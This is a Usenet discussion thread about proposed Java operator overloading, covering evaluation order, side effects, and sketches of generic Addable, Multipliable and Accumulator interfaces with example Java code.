Please remember that this is only an excerpt of our plans and that, for various reasons, some parts might have to be postponed. We hope the roadmap has something interesting for you, too. Feel free to comment below, submit a new feature request in our issue tracker if we’ve missed something, or upvote any existing requests to let us know they are important to you. We’re looking forward to your feedback! | https://blog.jetbrains.com/dotnet/2021/08/18/rider-2021-3-roadmap/ | CC-MAIN-2022-27 | refinedweb | 757 | 62.98 |
Lab Exercise 3: Loops, conditionals and command line parameters
The goal of this lab and project is to incorporate loops and conditionals into your code as well as provide more practice in encapsulating code and concepts for later re-use and manipulation.
Tasks
- In your personal file space, make a folder called Project3.
- Open a text editor (e.g TextWrangler). Create a new file called lab3.py. Put a comment at the top of the file with your name, date, and the file name. Save it in the Project3 folder.
- After the comment lines, write the command to tell python to import the turtle package and the sys package:
import turtle
import random
import sys
- First, let's find out what the sys package can do for us. Put the following line of code in your file.
print sys.argv
Save your file, cd to your working directory, and then run your lab3.py file. What do you see?
Now type some additional things on the command line after python lab3.py. For example, try:
python lab3.py hello world 1 2 3
What do you see?
The sys package gives us the ability to see what the user has typed on the command line. Each individual string (defined by spaces) from the command line is an entry in a list, which is a data type that we describe as a sequential container.
- Add the following three lines to your lab3.py file.
print sys.argv[0] print sys.argv[3] * 3 print int( sys.argv[3] ) * 3
Then run the program using the following command.
python lab3.py three times 3
What is going on? The first of the above three lines prints out the first item in the sys.argv list. The second line accesses the fourth item in the sys.argv list, which is a string with the digit '3' in it, and multiplies it by 3, which repeats the string three times. The third line accesses the fourth item in the sys.argv list, converts it to an integer type and then multiplies it by 3, which prints out the results of 3*3.
How could you use the capability to access values from the command line in a program?
- Remove the all of the print statements from the prior steps and type (or copy and paste) the following code for making a star into your lab3.py file right after the import statements.
def star(x, y, size): turtle.up() turtle.goto(x, y) turtle.down() for i in range(5): turtle.forward(size) turtle.left(144) turtle.tracer(False) turtle.color( 1.0, 1.0, 0.2 ) N = int( sys.argv[1] ) for i in range( N ): star( random.randint(-300, 200), random.randint(0, 200), random.randint(5, 15) ) turtle.update() raw_input('Enter')
Run the code using:
python lab3.py 50
Try running it with other command line values and see what happens. Try running it with no command line value.
- One thing you discover when you write software is that users do not always do what they should. They don't always give you enough information or the correct information. If you want to have a robust program, you have to check the information coming in to see if it is there.
For example, are there reasonable bounds on the number of stars in the image? What if the user does not put a command line parameter?
One strategy is to pick a default value (e.g. 100) and create a variable to hold the default value.
N = 100
If the user gives you a new value, then use the new value.
# check for user input if len( sys.argv ) > 1: N = int( sys.argv[1] )
The idea of having default behavior that the user can override is common in computer programs.
- Now we're going to explore the range function that is important for common loops in Python. Open up the Python interpreter in a terminal. Then call the built-in function range with a single integer as its argument. What does the function return?
Try giving the function two arguments. What does it return? Try several different pairs of arguments.
Try giving the function three arguments. What does it return? Try several different sets of arguments.
Try getting help on the range function by typing
help( range )
How does it match with what you discovered?
- Go back to your lab3.py file. You now know what the range function does. Create a function called star2( rays, size ) that takes two arguments. Inside the star function, write a for loop using the range function with rays as the number of times to loop.
Inside the loop, print out the loop variable. The loop variable is the symbol after the for keyword and is also called the loop control variable. The code below is an example.
def star2( rays, size ): # loop over the list returned by the range function for i in range(rays): print i
Put a call to the star2 function with the arguments 10 and 50 in your main code section. Run your program and see what prints out.
- In the star2 function, inside the for loop, set its heading to i * 360 / rays and then have the turtle go forward by size and backward by size.
def star2( rays, size ): # loop over the list returned by the range function for i in range(rays): turtle.setheading( i * 360 / rays ) turtle.forward( size ) turtle.backward( size )
What is this going to do? What happens if you give it different arguments?
- Modify your main code so that it checks for a second argument from the command line and assigns an int version of it to the variable rays. Set the default value for the number of rays to 10. Use the variable as the first argument to star2.
When you have it working correctly, you should be able to control the length of each ray and the number of rays in each star from the command line.
- The final lesson on code organization today is enclosing all of your top-level code in a main function and the making the execution of that function dependent upon whether the file was imported into another file or run from the command line.
Put all of your top-level code in the body of a new function called "main". After the main function definition, put the following top-level code.
if __name__ == "__main__": main()
Run your file.
The above conditional statement will be true only when you run the python file on the command line. If you were to import this file into another python program, the conditional statement would evaluate to false and the main function would not run.
The real benefit is that you can write test functions for a collection of functions--like your shapes.py file--without having your test function interfere with importing it into other programs.
From now on, your files should always have that conditional in front of top-level code.
When you are done with the lab exercises, you may begin the project. | http://cs.colby.edu/courses/S15/cs151-labs/labs/lab03/ | CC-MAIN-2017-51 | refinedweb | 1,188 | 75.81 |
Technical Support
On-Line Manuals
Compiler Reference Guide
Version 6.14
Prints dependency lines for header files even if the header files are missing.
Warning and error messages on missing header files are suppressed, and
compilation continues.
-MG
-M
-MM
source.c contains a reference to a missing header file
header.h:
source.c
header.h
#include <stdio.h>
#include "header.h"
int main(void){
puts("Hello world\n");
return 0;
}
This first example is compiled without the -MG option, and results in an error:
armclang --target=aarch64-arm-none-eabi -mcpu=cortex-a53 -M source.c
source.c:2:10: fatal error: 'header.h' file not found
#include "header.h"
^
1 error generated.
This second example is compiled with the -MG option, and the error is suppressed:
armclang --target=aarch64-arm-none-eabi -mcpu=cortex-a53 -M -MG source.c
source.o: source.c \
/include/stdio.h \
header. | https://www.keil.com/support/man/docs/armclang_ref/armclang_ref_vvi1454597476176.htm | CC-MAIN-2020-40 | refinedweb | 149 | 53.27 |
A tool that automatically formats Python code to conform to the PEP 8 style guide
Project Description
From easy_install:
$ easy_install -ZU autopep8
Usage
To modify a file in place (with all fixes enabled):
$ autopep8 --in-place --aggressive <filename>
Before running autopep8.
import sys, os; def someone_likes_semicolons( foo = None ,\ bar='bar'): """Hello; bye."""; print('A'<>foo<>134342<>23434<>3!=3<>5!=3)# <> is a deprecated form of != return 0; def func11(): a=( 1,2, 3,"a" ); ####This is a long comment. This should be wrapped to fit within 72 characters. some_variable = [100,200,300,9876543210,'This is a long string that goes on'] def func22(): return {'has_key() is deprecated':True}.has_key({'f':2}.has_key('')); someone_likes_semicolons(foo=None, bar='bar'): """Hello; bye.""" # <> is a deprecated form of != print('A' != foo != 134342 != 23434 != 3 != 3 != 5 != 3) return 0 def func11(): a = (1, 2, 3, "a") # This is a long comment. This should be wrapped to fit within 72 # characters. some_variable = [ 100, 200, 300, 9876543210, 'This is a long string that goes on'] def func22(): return ('' in {'f': 2}) in {'has_key() is deprecated': True} files/directories that match these comma- separated globs --list-fixes list codes for fixes; used by --ignore and --select --ignore=errors do not fix these errors/warnings (default: E24,W6) --select=errors fix only these errors/warnings (e.g. E4,W) --max-line-length=n set maximum allowed line length (default: 79). E27 - Fix extraneous whitespace around keywords. E301 - Add missing blank line. E302 - Add missing 2 blank lines. E303 - Remove extra blank lines. E304 - Remove blank line following function decorator.. W191 - Reindent all lines. W291 - Remove trailing whitespace. W293 - Remove trailing whitespace on blank line. W391 - Remove trailing blank lines. E26 - Format block comments. W6 - Fix various deprecated code (via lib2to3). W602 - Fix deprecated form of raising exception.
autopep8 also fixes some issues not found by pep8.
- Correct deprecated or non-idiomatic Python code (via lib2to3). (This is triggered if W6 is enabled.)
- Format block comments. (This is triggered if E26 is enabled.)
- Normalize files with mixed line endings.
- Put a blank line between a class declaration and its first method declaration. (Enabled with E301.)
- Remove blank lines between a function declaration and its docstring. (Enabled with E303.)
More advanced usage
To enable only a subset of the fixes, use the --select option. For example, to fix various types of indentation issues:
$ autopep8 --select=E1,W1 <filename>
Similarly, to just fix deprecated code:
$ autopep8 ->
--aggressive will also shorten lines more aggressively. It will also remove trailing whitespace more aggressively. (Usually, we don’t touch trailing whitespace in docstrings and other multiline strings. And to do even more aggressive changes to docstrings, use docformatter.)
Use as a module
The simplest way of using autopep8 as a module is via the fix_string() function.
>>> import autopep8 >>> autopep8.fix_string(.
Release history Release notifications
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages. | https://pypi.org/project/autopep8/0.9.2/ | CC-MAIN-2018-17 | refinedweb | 492 | 60.92 |
#include <unistd.h>.
fd is not a
valid file descriptor.
pgrp has an
unsupported value.
The calling process does not have a controlling
terminal, or it has one but it is not described by
fd, or, for
tcsetpgrp(), this
controlling terminal is no longer associated with the
session of the calling process.
pgrp has a
supported value, but is not the process group ID of a
process in the same session as the calling process.
For an explanation of the terms used in this section, see attributes(7).
These functions are implemented via the
TIOCGPGRP and
TIOCSPGRP ioctls.
setpgid(2), setsid(2), credentials(7) | http://manpages.courier-mta.org/htmlman3/tcgetpgrp.3.html | CC-MAIN-2017-22 | refinedweb | 104 | 65.62 |
Deploy software to a private IBM Cloud Hyper Protect Virtual Server using IBM toolchain
Build, test, and deploy on custom servers with the IBM Delivery Pipeline
With IBM Cloud Continuous Delivery, you can build, test, deploy, and manage apps with toolchains. IBM Cloud Continuous Delivery includes delivery pipelines, making these tasks automated, which in turn, requires little to no human interference.
In this tutorial, you’ll learn how to deploy on custom servers using the IBM Delivery Pipeline, which is commonly used to deploy builds on Kubernetes or Cloud Foundry. We’ll be using the demo application AcmeAir, a Node.js implementation of the Acme Air Sample Application. The code will be automatically integrated, dockerized on a custom-built server, uploaded to a private container registry, and deployed on multiple custom servers (in this case the IBM Cloud Hyper Protect Virtual Servers). The best part is that all of this can be done using resources available through an IBM Cloud account. Let’s get started!
Prerequisites
To complete this tutorial, you need the following:
- A computer to customize the toolchain running Docker
- An IBM Cloud account
- A configured IBM Cloud Container Registry
Estimated time
Completing this tutorial should take about 1 hour.
Step 1: Set up your Hyper Protect Virtual Server
To begin, you need to create the server required to deploy your software on the private server. Don’t worry, setting up a Hyper Protect Virtual Server is simple.
Begin by opening the command line interface (CLI) on your computer and generate an SSH key pair by entering the command
ssh-keygen and following the instructions. Make sure to remember where you store your SSH keys (you may need to install OpenSSH before doing this).
Now, use the generated private key to create your Hyper Protect Virtual Server here. Try to log in to your server via the terminal to make sure everything is working properly. You can find this process explained in more detail in the Hyper Protect Virtual Server overview as well as in the SSH documentation.
Step 2: Enable an SSH key login for your IBM Delivery Pipeline
To enable the toolchain to deploy on custom servers, you use a custom docker image running Linux, which stores the SSH keys. This will be used to send commands on to your server. I’ll discuss more on this later.
To generate the docker image, download the
sshimage folder from this git repository to your desktop. If you’re using a Mac, use Shift+Command+G in Finder to open the Go to Folder search mask. If you’re on a Windows device, you’ll use Windows+R.
Enter
~/.ssh/ or enter the path shown on your terminal when you generate your SSH keys. A folder should open with three text files inside named id_rsa, id_rsa.pub, and known_hosts. Copy all three files in this folder.
Now, open the CLI and navigate to the
sshimage folder. Run the command
docker build. Docker creates an image with a small Linux version and your keys in place. With the command docker
image ls you should be able to see your newly created image.
Next you need to tag
docker tag <local_image> us.icr.io/<my_namespace>/<my_repo>:<my_tag> and upload
docker push us.icr.io/<my_namespace>/<my_repo>:<my_tag> to your image to the IBM Container Registry. Check out the Kubernetes Registry Quick Start guide for more details.
Step 3: Create the pipeline
Head over to the DevOps toolchains page and create a Cloud Foundry toolchain. Link the git repository with the code you want to use and enter an API-Key (if you don’t have one you can generate one).
After creating your toolchain, you should see a dashboard where you can configure multiple elements. Click the field with the label Delivery Pipeline. The two stages of your pipeline should now be visible.
Click on the gear in the upper right corner of the Build Stage and then click the Configure Stage option. Choose the custom Docker image as your builder type and enter the name of your
sshimage from your IBM Cloud Container Registry.
Next, click on Add Job and select Deploy. Choose the custom Docker image as your builder type. Enter the name of your
sshimage from your Cloud Container Registry.
Now open the Environment properties tab. Add a secure property with the name DOCKER_USERNAME and the value iamapikey. Add a second secure property with the name DOCKER_PASSWORD and an API key as your value. You can generate an API key here. Finally, add a text property with the name SERVER1 and the IP address of your Hyper Protect Server as its value.
Step 4: Configure the pipeline
Please note that the following steps are specific to the Node.js version of AcmeAir but altering these steps for different programs can be done.
Go back to the Jobs tab, open your Build Stage, and add this to the Build Script window:
ssh -t -t $SERVER_1 'rm -r acmeair-nodejs' ssh -t -t $SERVER_1 'git clone' ssh -t -t $SERVER_1 'cd acmeair-nodejs && docker build -t acmeair/web .'
Find the Jobs tab once more and open your Deploy Stage. Now enter the following in the Build Script window:
ssh -t -t $SERVER_1 'docker login -u iamapikey -p $DOCKER_PASSWORD uk.icr.io' ssh -t -t $SERVER_1 'docker tag acmeair/web uk.icr.io/hansdocker/acmeair' ssh -t -t $SERVER_1 'docker push uk.icr.io/hansdocker/acmeair'
Return to your toolchain overview and press the play button on your Build Stage to see if your toolchain is working. After it’s finished, you should see the
sshimage in the form of a docker image in your IBM Container Registry.
Navigate back to the overview of your pipeline and click on the gear in the upper right corner of the Deploy Stage. Then, click on Configure Stage.
Open the Environment properties tab and add a secure property with the name DOCKER_USERNAME and the value iamapikey.
Add a secure property with the name DOCKER_PASSWORD and an API key as your value. Then add a text property with the name SERVER1 and the IP address of your Hyper Protect Server as its value.
Return to the Jobs tab and remove the Rolling Deploy stage. You now need to create four new Deploy Stages and name them Prepare, Deploy, Availability Test, and Info. Set all four stages to use the custom Docker image
sshimage, just like you did in the previous step. Now you’re ready to set the code for these four stages.
For the Prepare stage enter:
ssh -t -t root@$SERVER 'docker stop acmeair_web_001' ssh -t -t root@$SERVER 'docker rm acmeair_web_001' ssh -t -t root@$SERVER 'docker ps'
For the Deploy stage enter:
ssh -t -t root@$SERVER 'docker login -u iamapikey -p $DOCKER_PASSWORD uk.icr.io' ssh -t -t root@$SERVER 'docker pull uk.icr.io/hansdocker/acmeair' ssh -t -t root@$SERVER 'docker run -d -P -p 9080:9080 --name acmeair_web_001 --link mongo_001:mongo uk.icr.io/hansdocker/acmeair'
For the Availability Test stage enter:
#!/bin/bash if curl -ivs then echo "Server is UP" else echo "Server is down" 1>&2 fi
For the Info stage enter:
ssh -t -t root@$SERVER 'docker ps' echo
Now return to your toolchain overview and click play on your Deploy Stage to see if your toolchain works.
After your finished, you should be able to click on Info in the list of your stages to view your logs. There will be a link to the AcmeAir website running on your Hyper Protect Virtual Server. You can easily add more servers by simply duplicating the Deploy Stage and changing the IP address in the environment properties to your new server.
Summary
Congratulations! By following this tutorial, you can now use IBM toolchain to connect to various servers by using the SSH connection standard. If you’d like, check out the IBM Toolchain deploys to Hyper Protect Virtual Servers video that demonstrates the toolchain running and explains the function of the code in more detail.
You can also learn more about the IBM Delivery Pipeline and toolchain by visiting the IBM Cloud documentation. | https://developer.ibm.com/tutorials/deploy-software-to-private-hyper-protect-virtual-servers-using-ibm-toolchain/ | CC-MAIN-2020-34 | refinedweb | 1,360 | 63.09 |
Important: Please read the Qt Code of Conduct -
Convert QVariantList to QList<Type> list
Hi All
I have a QVariantList which is passed as a parameter to my function.
void myfunc(const QVariantList &list) { // I want to convert this to QList<Type> newList // where Type is the type() of list.at(0) // the variant list consists of variants all of the same type }
What I want to do is
QList<Type> newList; //how do I declare this if I dont know the Type foreach(QVariant v, list) newList << v.value();
Then create a QSet from the newList
Is there a way of easily achieving this
Regards
Ikim
Hi and welcome to devnet,
Do you mean
QSet<Type> newSet = newList.toSet();
?
If so, why not:
QSet<Type> newSet; foreach(QVariant v, list) { newSet << v.value<Type>(); }
?
Hi and thanks
How do I declare QSet<Type> at compile time when I dont know Type
Thanks
What is your use case ?
How do I declare QSet<Type> at compile time when I dont know Type
You can't! In C++ you must define the type of templates.
Question: Why cannot you use
QSet<QVariant>??
Hi
I need to compare two variantlist both containing variants of the same type and determine the variants that are common to both lists
Thanks
You can use
QVariantdirectly without conversion because QVariant supports
operator==()
QVariant has the == operator
@SGaist yes I could compare each QVariant in the list but that would mean iterating over the entire list to determine if the item exists in the second list. Is that my only option ?
Thanks
No, use the QSet features e.g.
QSet<QVariant> commonSet = mySet1 & mySet2;
@SGaist Thanks, so I can use a QSet<QVariant> out of the box ?
other forums are suggesting that I need to define a qhash() function for the QVariant.
QSetis based on a hash table; this means that internally it uses qHash()
@ikim why not use QVariant::Type method? even you can use it with c++ template.
@mcosta Thanks but this gives a compile error
QSet<QVariant> existingValues;
existingValues.insert(1);
Which kind of error?
@mcosta /usr/include/QtCore/qhash.h:882:24: error: no matching function for call to 'qHash(const QVariant&)'
mmmm, You're right.
So I suggest to create a
templatemethod
This code works for me
template <typename T> QSet<T> mergeList(const QVariantList& l1, const QVariantList& l2) { QSet<T> s1, s2; for (const QVariant& v: l1) { s1.insert(v.value<T>()); } for (const QVariant& v: l2) { s2.insert(v.value<T>()); } return s1 & s2; }
Used as
QVariantList l1, l2; l1 << 1 << 2 << 3; l2 << 1 << 3 << 5; QSet<int> s1 = mergeList<int> (l1, l2); qDebug() << s1; l1.clear(); l2.clear(); l1 << "Foo" << "Bar"; l2 << "Bar" << "Fred"; QSet<QString> s2 = mergeList<QString> (l1, l2); qDebug() << s2;
@mcosta Thanks for your effort, but this still doesn't solve the problem as I dont know the Type at compile time
Hi,
I'm not a C++ super-guru but I don't think you can do it because the compiler must know the type of each variable at compile time.
A solution could be implement
qHash(const QVariant &v)and use
QSet<QVariant>
@SGaist yes I could compare each QVariant in the list but that would mean iterating over the entire list to determine if the item exists in the second list. Is that my only option ?
Thanks
I think @mclark 's answer is the better one.
You can also implement qHash for the type you need to support and thus it will be used automatically in all your software.
#include <QtDebug> inline uint qHash(const QVariant &key, uint seed = 0) { switch (key.userType()) { case QVariant::Int: return qHash(key.toInt(), seed); case QVariant::UInt: return qHash(key.toUInt(), seed); // add all cases you want to support; } return 0; } int main( int argc, char * argv[] ) { QApplication app( argc, argv ); QVariantList vl1; QVariantList vl2; for (int i = 0 ; i < 5 ; ++i) { vl1 << i; } for (int i = 0 ; i < 3 ; ++i) { vl2 << i; } qDebug() << (vl1.toSet() & vl2.toSet()); return 0; } | https://forum.qt.io/topic/52629/convert-qvariantlist-to-qlist-type-list | CC-MAIN-2021-10 | refinedweb | 675 | 69.11 |
public class HelloWorld{
public static void main(String []args)throws IOException { try { for(int i=0;i<24;i++) { for(int j=0;j<60;j++) { for(int k=0;k<60;k++) { clrscr(); System.out.print(i+":"+j+":"+k); Thread.currentThread().sleep(1000); /* if(kbhit()) exit(0);*/ } } } }
hi friend,
you have missed the catch/finally block
There must be a catch/finally block used with the try
If you are facing any programming issue, such as compilation errors or not able to find the code you are looking for.
Ask your questions, our development team will try to give answers to your questions. | http://roseindia.net/answers/viewqa/Java-Beginners/29444-error-rectify.html | CC-MAIN-2013-20 | refinedweb | 104 | 54.56 |
PKS namespacecsam2020 May 8, 2019 11:40 PM
Hi,
We are in the process of implementing the PKS infrastructure. Since we are quite new to this topic, would like to get some guidelines/best practices on the below point.
Since we are going to use the same setup for the Development, QA & Production , what is the best practices to segregate these environments.
Is it have separate clusters for each environment [DEV/QA &POD]?, and create namespaces within to segregate different projects?
Or
Have one or two clusters [one for DEV & QA and one for PRD] and segregate each project with respect to the namespaces?
or
Any other recommendations?
Kindly advice.
Regards,
Sam
1. Re: PKS namespacenathanreid May 29, 2019 8:23 AM (in response to csam2020)
Hi Sam,
There are pros and cons to either approach, so not one correct answer to your question. Multiple clusters per environment will enable you to test different cluster config changes, provide a greater degree of segregation between workloads, and allow you to dedicate resources with less configuration in k8s. Namespace isolation reduces the number of cluster configs you need to manage (e.g. k8s cluster secrets, etc.) but won't enable you to test things like changed in k8s cluster security without affecting both dev and prod.
With a good ci pipeline method/gitops, you will reduce the amount of effort and potential for error in config parity across clusters. PKS provisioned k8s clusters with NSX CNP and namespace firewalling enable considerable isolation between workloads, but it will not address the topics I've listed above. If your goal is to have the most flexibility and resilience in testing, my opinion is that multiple clusters is a better option. With PKS, you could even create a dev and test cluster as part of your ci pipeline, and then tear them down after promotion to prod.
2. Re: PKS namespacedrfooser Jun 12, 2019 1:08 PM (in response to csam2020)
We have Pivotal Container Services and BOSH running on our VMWare vSAN. We chose to deploy multiple K8S clusters - Development, QA, Application Engineering & Infrastructure. This is working well for us so far. It still allows individual members of each team to have their own namespace within their teams cluster. | https://communities.vmware.com/message/2858050 | CC-MAIN-2019-35 | refinedweb | 375 | 62.27 |
Save
this as helloworld.py anywhere in your Python
path:
import irc
dependencies=[]
IRC_Object=None
def send_hi(self, channel):
self.send_string("PRIVMSG %s :Hello World!" % channel)
def handle_parsed(prefix, command, params):
if command=="PRIVMSG":
if params[1]=='hi':
IRC_Instance.active.events['hi'].call_listeners(params[0])
def initialize( ):
irc.IRC_Connection.send_hi=send_hi
def initialize_connection(connection):
connection.add_event("hi")
connection.events['parsed'].add_listener(handle_parsed)
The first line is the import irc needed to get
access to the IRCLib classes.
The first variable
defined in this extension script is dependencies.
If your extension depends on other extensions to work, you can put
the names of the extensions in this list. IRCLib will then load these
extensions first before loading yours.
IRC_Instance is a reference to the
IRC_Object instance in the program that is loading
your extension.
The script then continues to define four
functions:
This function will get added to the IRC_Connection
class. It sends the string "Hello
World!" to the channel specified by
channel.
This is an event handler for the 'parsed' event.
It's used to get the parsed lines from IRCLib. If
the line matches with "hi," all
listeners for the 'hi' event are called. The
destination of the message (was it said in a channel or private
message?) is given to the event handlers as the first argument. Note
that it's using
IRC_Instance.active to get the connection that
triggered the event. This variable exists so you
don't have to pass IRC_Connection
references to each event handler.
This function is called immediately after the script is loaded. This
sets the send_hi function as a method for the
class IRC_Connection.
This function is called each time a new connection is created, with
the IRC_Connection instance as its only argument.
The first line of the function adds a 'hi' event
to each connection. The second line connects
'handle_parsed' to the 'parsed'
event for each connection.
O'Reilly Home | Privacy Policy
© 2007 O'Reilly Media, Inc.
Website:
All trademarks and registered trademarks appearing on oreilly.com are the property of their respective owners. | http://oreilly.com/pub/h/1970#code | crawl-003 | refinedweb | 343 | 52.46 |
Topic Last Modified: 2007-11-09
You can use Microsoft Visual Studio 2005. In many ways, it is better to use wsdl.exe to generate proxies than to use the Add Web Reference wizard in Visual Studio 2005., open a Command Prompt Window.
Run wsdl.exe with the following suggested arguments:
The following is an example of the full command:
wsdl.exe /namespace:ExchangeWebServices /out:EWS.cs with the following suggested arguments:
csc /out:EWS_E2K7_release.dll /target:library EWS.cs.
Add a reference to the library that you created in step 3. You can now view IntelliSense information in the Object Browser or the text editor while you are instantiating a new class. | http://msdn.microsoft.com/en-us/library/bb629923.aspx | crawl-002 | refinedweb | 113 | 52.76 |
The reverse lines per second seems to be working at the same rate on PC: PC sends 19K strings to T4 sketch that counts \n and then the string to Serial2 once per second:
PC code uses same lps_test code with 'S' for send as param 2 - will post later.PC code uses same lps_test code with 'S' for send as param 2 - will post later.Code:count= 10976993, lines per second=18893. count= 10996057, lines per second=19064. // PC SENDS THIS count= 11014347, lines per second=18290. count= 11032841, lines per second=18494. count= 11051516, lines per second=18675. // T4 calculates and appends this with print count= 11070233, lines per second=18717.
There is some ECHO anomaly above with println('.'); is generally correct but with code as follows { #if 1 versus #if 0} I get a lot of this:
Output above using TyCommander - similar from using IDE SerMon - so seems to be a bug somewhere as T_3.5 gets it Serial2 then it sends out USB … will send text OUT Serial to PC and have it print instead:Output above using TyCommander - similar from using IDE SerMon - so seems to be a bug somewhere as T_3.5 gets it Serial2 then it sends out USB … will send text OUT Serial to PC and have it print instead:Code:count= 10969835, lines per second=18854 count= 10988580, lines per second=18745 45 count= 11007214, lines per second=18634 34 count= 11026041, lines per second=18827
Code:count= 10465392, lines per second=19022 22 count= 10484416, lines per second=19024 count= 10503446, lines per second=19030 30 count= 10522287, lines per second=18841 count= 10540880, lines per second=18593 93 count= 10559403, lines per second=18523 23 count= 10578191, lines per second=18788 count= 10596470, lines per second=18279 79 count= 10615171, lines per second=18701 01 count= 10634039, lines per second=18868 count= 10652267, lines per second=18228Code:uint32_t count, prior_count; uint32_t prior_msec; uint32_t count_per_second; void setup() { Serial.begin(1000000); Serial2.begin(2000000); // while (!Serial) ; count = 10000000; prior_count = count; count_per_second = 0; prior_msec = millis(); } void yield() {} void loop() { char c; int ii = 0; char buf[100]; while (Serial.available()) { c = Serial.read(); if (c == '\n') { count = count + 1; uint32_t msec = millis(); if (msec - prior_msec > 1000) { prior_msec = prior_msec + 1000; count_per_second = count - prior_count; prior_count = count; buf[ii] = 0; Serial2.print(buf); #if 1 // this is showing echo on print of last digits of count_per_second and newlines Serial2.println(count_per_second); #else Serial2.print(count_per_second); Serial2.println('.'); #endif ii = 0; } } else { buf[ii++] = c; } } } | https://forum.pjrc.com/threads/54711-Teensy-4-0-First-Beta-Test/page109?s=f37c60dd512a72e1bda4ab813a4062c1 | CC-MAIN-2019-35 | refinedweb | 419 | 67.38 |
The command sets a scale and offset for all attachments made to a specified device axis. Any attachment made to a mapped device axis will have the scale and offset applied to its values. The value from the device is multiplied by the scale and the offset is added to this product. With an absolute mapping, the attached attribute gets the resulting value. If the mapping is relative, the final value is the offset added to the scaled difference between the current device value and the previous device value. This mapping will be applied to the device data before any mappings defined by the setAttrMapping command. A typical use would be to scale a device’s input so that it is within a usable range. For example, the device mapping can be used to calibrate a spaceball to work in a specific section of a scene. As an example, if the space ball is setup with absolute device mappings, constantly pressing in one direction will cause the attached attribute to get a constant value. If a relative mapping is used, and the spaceball is pressed in one direction, the attached attribute will jump a constantly increasing (or constantly decreasing) value and will find a rest value equal to the offset. There are important differences between how the relative flag is handled by this command and the setAttrMapping command. (See the setAttrMapping documentation for specifics on how it calculates relative values). In general, both a relative device mapping (this command) and a relative attachment mapping (setAttrMapping) should not be used together on the same axis.
Derived from mel command maya.cmds.setInputDeviceMapping
Example:
import pymel.core as pm pm.assignInputDevice( '"move -r XAxis YAxis ZAxis"', d='spaceball' ) pm.setInputDeviceMapping( d='spaceball', ax=['XAxis', 'YAxis', 'ZAxis'], scale=0.01, r=True ) # The first command will assign the move command to the spaceball. # The second command will scale the three named axes by 0.01 and # only return the changes in device position. | http://www.luma-pictures.com/tools/pymel/docs/1.0/generated/functions/pymel.core.system/pymel.core.system.setInputDeviceMapping.html#pymel.core.system.setInputDeviceMapping | crawl-003 | refinedweb | 330 | 56.15 |
Re: Operator overloading [was Re: 7.0 wishlist?]
- From: Jerry Gerrone <scuzwalla@xxxxxxxxx>
- Date: Mon, 17 Nov 2008 04:32:07 -0800 (PST)
On Nov 16, 11:27 pm, Joshua Cranmer <Pidgeo...@xxxxxxxxxxxxxxx> wrote:
A reason why immutability is a good thing. In any case, the intent I
attempted to convey was the fallacy of naïve translation of mathematical
concepts to programming.
Somehow, I doubt Harry was proposing that the translation be naïve. :)
A side effect is a side effect. True, some may be only visible to the
internal code in the API, but, as far as the JLS is concerned, it's a
side effect if some Java code could detect the difference.
As I understood the proposal, it would have to break encapsulation to
do so, and the semantics of well-behaved code wouldn't be dependent on
the exact order of evaluation, although the performance might be.
Poorly-behaved code would behave in a manner that would require
language-lawyering, just like it already does with multiple "i++" in
one line of code. An example I think Harry'd mentioned explicitly.
(The above assumes correct code).
While users ideally need only deal with correct code, the specification
must deal with any valid code.
I'm sure it would.
To paraphrase a CSS spec developer: "You
may not worry about what a web page looks like on a 3x3-pixel screen,
but a browser has to worry about that."
A browser might as well give up on that and assume some sort of
minimum that's a darn sight bigger than 3x3; no matter what it does,
the results will be unusable below some threshold resolution, so it
might as well be designed to give the best possible results above that
threshold regardless of the effects doing so has below that threshold.
Worrying about how the presentation might degrade at 3x3 is like
worrying about how you'll get to work the next day if your car goes
over that cliff at 40mph, when you happen to be in that car.
I doubt a change that would break either of these conditions would fly:
* User-overloaded operators would evaluate in the same order as the
operators they are based on, i.e. operands are evaluated as they appear
and associate as the operators (left-to-right except for the few
right-to-left ones).
* An expression involving user-overloaded operators can be rewritten as
an expression (not a series of statements) using the base methods.
I don't see why the second one is necessary. The first one is strongly
desirable, but for the case of OlderClass op NewerClass with
NewerClass defining op it will generally be necessary to give up the
second one to get the first.
2. The spirit of operator overloading should be agnostic to the name of
the operator being overloaded, modulo something like interface names or
the arity of the operator.
Why?
A proposal I saw on the possibility of "contracts" (or static
implementation of interfaces) gave me an idea to work around the
LHS-issue with a bit more workaround:
public interface Addable<Left, Right, Value> {
Value add(Left left, Right right);
}
public class Matrix<T extends ...> implements
static Addable<Matrix<T>, Matrix<T>, Matrix<T>>,
static Multipliable<T, Matrix<T>, Matrix<T>> {
static Matrix<T> multiply(T scalar, Matrix<T> matrix) {
Matrix<T> result = new Matrix<T>(matrix);
for (T[] row : result.rows) {
for (int i = 0; i < row.length; i++) {
row[i] = T * row[i];
}
}
}
}
with suitable `? super' and `? extends' thrown in the type definitions.
Writing generics libraries is still a pain, though.
Thus the compiler could then translate the expression |scalar * matrix|
to |multiply(scalar, matrix)|...
Seems pointless to introduce a whole new kind of "interface" for this
purpose. In that case, you might as well just allow static methods
Foo.operator+ (or whatever, I used the C++-like name) and operator
overloading enabled using import static.
Given such a fix, Addable and similar interfaces enable extending
java.util (or java.math?) with useful new things, for example an
accumulate method that can take a Collection<Addable<Foo>> and return
a Foo that is their sum, or an Accumulator<Foo> that can perform
accumulations.
Implementation via interfaces opens up wide possibilities that could not
be offered by other proposals for operator overloading. Indeed, it is
probably safe to say that these interfaces alone--along with
retrofitting the appropriate primitive wrappers, BigInteger, and
BigDecimal--would be powerful enough, even if operator overloading
didn't follow.
They would also make operator overloading that much "closer", in some
sense, such that it'd have a decent shot at getting in in the *next*
Java version after the one that added Harry's proposed interfaces.
One step at a time, I'd say. Pin down the implementation of regular
operator overloading before trying to extend it.
I thought this was now about implementing these interfaces and some
compiler tweaks, then adding operator overloading later as a layer on
top?
Harry?
Hmm...
public interface CumulativeAddable<Param, Return> extends
Addable<Param, Param, Return> {
public Return add(Param... params);
}
Erk. I think I prefer Accumulator.
fully generalize this -- left-summand type, right-summand type, and
result type; StringBuilder would implement
Accumulator<String,Object,String> since it can add any Object to a
String and return a String, for instance.
But it can also add any String to an Object and get a String. Unfortunately.
As I understood Harry's latest proposal, this would basically be
StringBuilder, not String.
Eh, then the third type parameter's not needed. Or the first isn't.
It'd just be Accumulator<Object,String>, left hand argument is what
you can add, right hand argument is the type of the running sum and of
the result. Addable<Object,String> on String, also, since it can be
added to any Object to get a String.
Eh. You also need a way to get the "zero" for the accumulation.
Addable needs a getIdentity() method, and ugly-enough this needs to be
non-static for an interface to specify it. For strings it would return
"", for numbers zero.
